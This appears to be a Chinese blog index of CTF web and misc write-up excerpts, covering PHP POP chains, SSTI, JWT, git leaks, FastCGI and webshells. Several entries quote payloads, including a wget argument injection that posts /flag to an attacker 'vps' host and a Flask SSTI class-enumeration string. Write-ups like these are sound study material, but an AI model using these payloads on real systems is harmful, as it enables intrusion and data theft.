[羊城杯 2020]EasySer

知识点:pop链,写入木马,蚁剑连接
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

buuctf Crypto 1--4

知识点:凯撒密码解题过程下载附件,加压之后,是个txt文件synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}凯撒密码凯撒密码在线工具位移13位之后得到flag
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

[HFCTF2020]EasyLogin

知识点:nodejs,jwt文章目录解题过程参考链接解题过程打开题目是个登录窗口,需要注册账号,然后登录,登录之后,有个获取flag的按钮,但是不能够获取flag,因为permission denied。可以发现提示/static/js/app.js/** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */function login() { const username = $("#username").val();
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

ctfshow 2021 月饼杯 web

文章目录web签到web签到<?php//Author:H3h3QAQinclude "flag.php";highlight_file(__FILE__);error_reporting(0);if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $flag; } else { echo "
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

第三届第五空间网络安全大赛 Web复现

环境还没关,良心比赛方,赶紧趁着复现复现文章目录pklovecloudPNG图片转换器EasyCleanupyet_another_mysql_injectionWebFTPpklovecloud是个pop链,需要注意的地方是acp类型中的成员cinder是protected属性的,序列化之后会增加三个字符%00*%00(url编码之后) <?php include 'flag.php';class pkshow { function echo_name()
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

[DDCTF2018]流量分析

文章目录Quoted-printable编码私钥提交参考链接下载附件,一个流量包,一个提示Quoted-printable编码根据提示,筛选tcp contains "KEY",追踪tcp流,可以发现Quoted-printable编码,解码一下解码,提示需要安装密钥在上面的tcp流中,可以看到image001.png,将base64编码的字符串转换为图片,https://the-x.cn/base64下载之后,长这样我们可以使用OCR在线识别,将该图片上传,识别其中的字符因为识别过程
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

数据包中的线索

数据包中寻找http协议的流量追踪http流找到一个图片的流量对字符进行base64解码为图片格式https://the-x.cn/base64打开即可得flag
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

ez_serialize复现

文章目录解题过程解题过程题目给了源码 <?phperror_reporting(0);highlight_file(__FILE__);class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"; $this->para = "ctfer";
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

[天翼杯 2021]esay_eval复现

redis加载恶意so文件,绕过__wakeup函数
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

攻防世界_web进阶篇_mfw

一个git源码泄露题目文章目录git源码泄露源码分析构造payloadgit源码泄露打开容器,页面如下点击About,提示git源码泄露在url后面加上了/.git/,证明了这一点然后使用工具进行git源码下载,工具:https://github.com/BugScanTeam/GitHack在python2的环境下进行源码下载python GitHack.py http://111.200.241.244:59908/.git/最后在./dist文件夹下得到源码index.ph
分类: 其他 发布时间: 01-15 22:46 阅读次数: 0

DASCTF Oct X web

文章目录Web 欢迎来到魔法世界我的解法师傅的wpMisc WELCOME DASCTFxJlenuWeb 欢迎来到魔法世界打开容器,即进行php代码审计<?phphighlight_file('index.php');extract($_GET);//将GET方式传递的参数赋值error_reporting(0);function String2Array($data)//eval那里存在命令执行{ if($data == '') return array(); @
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0

陇原战“疫“2021网络安全大赛 Web MagicMail

知识点:本地起一个smtp服务,利用模板注入,找到可用的类文章目录MagicMail注入点测试模板注入参考链接MagicMail注入点这个题目很有意思,赛后根据官方wp进行复现首先是,我们需要输入一个有smtp服务的ip和相应的端口,这个可以在自己的vps起一个smtp服务python3 -m smtpd -c DebuggingServer -n 0.0.0.0:6667输入自己的服务器ip和6667(ip和port根据自己的情况修改)然后就是一个可以发送邮件的功能在email的内
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0

[蓝帽杯 2021]One Pointer PHP

[蓝帽杯 2021]One Pointer PHP文章目录[蓝帽杯 2021]One Pointer PHPphp数组溢出绕过open_basedir目录限制(glob)ftp的被动模式起一个ftp服务加载恶意的so文件生成payloadsuid提权参考文章
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0

[SCTF 2018]ZhuanXV

赛题:[SCTF 2018]ZhuanXV文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞读取文件使用dirsearch工具进行扫描发现/list,访问是个登录界面,查看源码发现背景图片的路径查看web.xmlhttp://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml发现使用了strut2框架,struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0

pearcmd.php的妙用

pearcmd.php的妙用文章目录pearcmd.php的妙用1. register_argc_argvcli模式下WEB模式中简单的利用2. pearcmd.php的神奇使用3. register_argc_argv和pear的关系4. payload靶机可出网靶机不可出网时参考链接1. register_argc_argv如果环境中含有php.ini,则默认register_argc_argv=Off;如果环境中没有php.ini,则默认register_argc_argv=On这个regis
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0

陇原战“疫“2021网络安全大赛 Web CheckIN

checkin文章目录checkinwget外带数据分析官方wpnosql注入ssrf参考链接参考链接:利用命令注入外带数据的一些姿势_一个安全研究员-CSDN博客_smb外带注入题目有附件下载,是个go语言,审计一下 ,文件目录如下注意wget还有wget外带数据根据上面的博客,可以执行命令wegt数据外带出来wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/然后既可以得到flag
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0

陇原战“疫“2021网络安全大赛 Web eaaasyphp

eaaasyphp文章目录eaaasyphp读取phpinfo打fastcgi恶意的ftp服务构造pop链参考链接题目给出了源码读取phpinfo尝试反序列化读取phpinfo但是__wakeup()函数先于destruct函数执行,所以需要绕过:__PHP :: Bug #81151 :: bypass __wakeup?code=C:4:"Hint":0:{}注意这个FPM/FastCGI打fastcgi使用Gopherus生成打fastcgi的payload:gopher
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0

[红明谷CTF 2021]write_shell

[红明谷CTF 2021]write_shell文章目录[红明谷CTF 2021]write_shell代码审计最后的payload参考链接代码审计题目给出了源码<?phperror_reporting(0);highlight_file(__FILE__);//检查是否还有违规符号function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(p
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0

冰蝎(Behinder)双击无法打开

冰蝎(Behinder)双击无法打开文章目录冰蝎(Behinder)双击无法打开尝试过的解决方法最后的解决方法参考链接不想讲过多废话:我的环境如下,如果感觉环境不是很相符的,可以关闭这个页面了windows10java环境 11.0.2 2019-01-15 LTS做题需要用到冰蝎,所以去github上进行下载,放一下链接:Releases · rebeyond/Behinder (github.com)点击这个下载之后,解压,然后我本机是安装了java环境的,java11.0.2但是双
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0

[CSCCTF 2019 Qual]FlaskLight

[CSCCTF 2019 Qual]FlaskLight文章目录[CSCCTF 2019 Qual]FlaskLight模板注入payload1payload2payload3参考文章模板注入搜索,返回查询内容f12中提示,GET方式传参search可以判断ssti查看所有子类?search={{''.__class__.__mro__[2].__subclasses__()}}寻找可用子类,这里使用下python脚本来寻找可用类的序号import requestsimport re
分类: 其他 发布时间: 01-15 22:45 阅读次数: 0